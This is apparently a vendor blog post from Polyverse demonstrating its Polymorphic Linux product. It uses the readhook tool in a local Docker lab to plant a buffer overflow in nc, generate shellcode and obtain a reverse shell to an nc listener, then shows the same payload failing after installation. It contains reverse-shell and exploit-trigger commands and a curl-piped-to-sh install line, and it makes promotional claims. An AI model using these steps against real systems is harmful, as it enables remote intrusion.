A look at how Polyverse applies a Moving Target Defense strategy to pro-actively protect against zero-day vulnerabilities before they’re disclosed or even discovered.

What are you doing about that nasty vulnerability circulating on the dark web? You know, the one that you won’t find out about for close to a year? If you’d stop using exactly the same bits as a million other people, you wouldn’t have to worry. With Polyverse Polymorphic Linux you can pull a new and unique binary whenever you want it.

In my previous readhook post, we looked at how to insert an intentional buffer overflow vulnerability into your app. Readhook hooks the libc “read” call and watches traffic for a special string, which triggers a curated buffer overflow. Beyond the buffer overflow endpoint, readhook also provides endpoints that fully generate the exploit required to get a reverse shell out of the attack surface area that your app already provides. Readhook is particularly suited to show how Polymorphic Linux protects you from “me-too” attacks, because it allows exploit payloads that contain encoded “offsets” rather than absolute addresses, allowing a red-hat attacker to quickly defeat ASLR, PIE and Stack Canaries for more productive and deeper risk assessments.

During the average of eight months that a zero-day vulnerability is “in the wild,” your app is vulnerable to “me-too” attacks by any black-hat hacker that has developed an exploit. For example, once an exploit for a recent vulnerability in WordPress was developed, it was used to attack nearly 170,000 sites per hour in a massive distributed brute force attack campaign.

In this post, we’ll use readhook to generate a payload targeted to the official version of libc, and then we’ll show how installing Polyverse Polymorphic Linux defeats any “me-too” exploit by breaking the attackers assumption that the binary files in your copy of Linux is exactly the same as everybody else’s?—?and therefore totally predictable.

Demonstration: (we’ll need three shell-sessions)

A listener to which the reverse-shell payload will “phone-home”

An instance of the server that we will be hooking with “readhook”

A client to act as the “remote” hacker

Set up for a reverse shell

(1) Start nc listening on port 5555 (Session-1)

nc -kl 5555

Run a simple nc echo server under readhook

(2) Start with a clean alpine:3.7 (Session-2)

docker run --rm --name echo -it -p 8080:8080 alpine:3.7 sh

(2) We’ll need curl and wget

apk update && apk add curl wget ca-certificates && update-ca-certificates

(2) Get readhook components

(2) Start nc with readhook in front of libc

LD_PRELOAD="/tmp/fullhook.so /tmp/basehook.so" nc -l -p 8080 -e /bin/cat

Generate shellCode and perform exploit

(3) Generate shell-code for the exploit (Session-3)

export shellCode=$(echo "xyzzxMAKELOADdocker.for.mac.localhost" | nc localhost 8080)

(2) Re-start nc with minimal readhook in front of libc

LD_PRELOAD=/tmp/basehook.so nc -l -p 8080 -e /bin/cat

(3) Send shellCode to the OVERFLOW for a reverse shell

echo $shellCode | nc localhost 8080

(1) Check that the overflow resulted in a remote shell

ls && whoami && exit

Install Polyverse Polymorphic Linux

(2) Add Polyverse as the preferred repository

curl https://repo.polyverse.io/install.sh | sh -s vZ2v3Bo4Kbnwj9pECrLsoGDDo

(2) Replace standard packages with Polymorphic Linux

sed -n -i '/repo.polyverse.io/p' /etc/apk/repositories && apk upgrade --update-cache --available

Test Polyverse Polymorphic Linux

(2) Restart nc with minimal readhook

LD_PRELOAD=/tmp/basehook.so nc -l -p 8080 -e /bin/cat

(3) Try the shellCode with Polymorphic Linux

echo $shellCode | nc localhost 8080

(1) Confirm that nobody phoned-home to the listener

(2) Confirm that the server terminated abnormally

Summary

ASLR was a good idea at the time, but is now routinely bypassed by hackers. Since ASLR does nothing about the layout of a binary, once you know anything about its location, you know everything about it. Polyverse Polymorphic Linux changes the actual layout of your binaries, making “me-too” attacks a thing of the past. Most importantly, only Polyverse Polymorphic Linux protects against undisclosed zero-day vulnerabilities during their typical eight-month existence before disclosure.

Resources